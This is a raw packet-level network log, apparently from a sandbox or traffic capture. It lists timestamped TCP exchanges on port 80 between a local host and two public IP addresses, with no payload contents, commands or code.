Feb 22, 2021 09:14:35.025774002 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025790930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025801897 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025816917 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025834084 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025847912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025875092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025887012 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025907040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025934935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025957108 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.025966883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.025995970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026015043 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026025057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026555061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026572943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026608944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026635885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026663065 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026664019 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026690960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026719093 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026726961 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026745081 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026752949 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026768923 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026793003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026817083 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026824951 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026840925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026859999 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026866913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026891947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026916027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026942968 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.026948929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.026994944 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.027777910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027815104 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027844906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027848005 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.027874947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027893066 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.027904987 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027934074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027957916 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.027966022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.027995110 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028007984 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028024912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028054953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028078079 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028084040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028112888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028129101 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028146029 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028177023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028208017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028225899 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028274059 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028533936 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028568983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028601885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028636932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028654099 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028669119 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028697968 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028702021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028736115 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028758049 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028764963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028796911 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028830051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028848886 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028861046 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028887033 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028892994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028923988 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028947115 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.028955936 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.028986931 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029031992 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029485941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029520988 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029546022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029572964 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029602051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029606104 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029628992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029630899 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029654980 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029658079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029685974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029700994 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029716015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029743910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029769897 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029772043 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029799938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029813051 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:35.029838085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029856920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:35.029900074 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:42.230117083 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.283288956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.284272909 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.288417101 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.341646910 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494074106 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494100094 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494116068 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494128942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494147062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494168997 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494187117 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494204044 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.494204044 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494223118 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494229078 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.494245052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.494324923 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.494339943 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.495254040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.495275021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.495465994 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.496495962 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.496514082 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.496584892 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.497822046 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.497848034 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.497981071 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.499064922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.499089956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.499197006 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.500324965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.500359058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.500689030 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.501584053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.501619101 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.502007008 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.522586107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.522619009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.522753954 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.523152113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.523174047 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.523396015 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.524465084 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.524502039 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.524702072 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.525764942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.525795937 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.525895119 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.547492981 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.547513008 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.547868013 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.548110962 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.548132896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.548213005 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.549406052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.549439907 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.549607038 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.550620079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.550642967 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.550818920 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.551966906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.552007914 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.552297115 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.553209066 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.553239107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.553437948 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.554441929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.554461002 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.554749012 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.555730104 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.555748940 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.555824995 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.557003021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.557024956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.557121992 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.558227062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.558243990 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.558574915 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.559566975 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.559588909 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.559699059 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.560837030 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.561436892 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.561458111 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.562661886 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.562731028 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.562755108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.563417912 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.563951969 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.563973904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.564429998 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.565226078 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.565237999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.565344095 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.566539049 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.566562891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.567771912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.567802906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.567853928 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.567893028 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.569005013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.569022894 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.569060087 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.570339918 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.570358038 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.571057081 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.576808929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.576838017 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.576891899 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.576908112 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.577697039 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.577718973 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.577749014 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.577781916 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.577835083 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.579016924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.579049110 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.579962969 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.600860119 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.600892067 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.601032972 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.601483107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.601506948 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.601797104 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.602683067 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.602706909 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.602790117 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.603831053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.603877068 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.603925943 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.605760098 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.605783939 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.606376886 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.606399059 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.607343912 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.607373953 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.607698917 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.607714891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.607858896 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.608810902 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.608831882 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.609093904 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.611150026 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.611177921 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.611722946 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.611783028 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.611807108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.611864090 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.612957954 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.612978935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.613118887 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.615617037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.615637064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.615704060 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.616313934 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.616343021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.617098093 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.617357016 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.617393970 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.617435932 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.618602991 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.618633032 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.620701075 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.620831013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.620857954 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.621020079 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.621356964 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.621392012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.621579885 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.622502089 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.622528076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.622646093 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.624013901 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.624041080 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.624265909 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.624553919 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.624638081 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.624813080 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.630780935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.630862951 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.631190062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.631230116 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.631474018 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.631505013 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.632033110 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.632070065 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.632738113 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.632904053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.632947922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.633136988 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.654064894 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.654089928 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.654860020 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.655777931 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.655805111 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.655903101 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.656812906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.656852007 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.657181978 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.660252094 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.660273075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.660667896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.660691977 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.660778046 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.660800934 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.661520004 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.661542892 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.661685944 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.662358999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.662384987 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.662758112 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.663099051 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.663117886 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.663486004 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.664830923 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.664851904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.664958000 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.666095018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.666115999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.666162968 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.666484118 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.666506052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.666670084 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.668678045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.668700933 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.668756962 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.670058012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.670375109 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.670392990 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.670680046 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.670695066 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.673711061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.673734903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.674863100 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.675082922 CET	80	49767	104.21.71.230	192.168.2.4
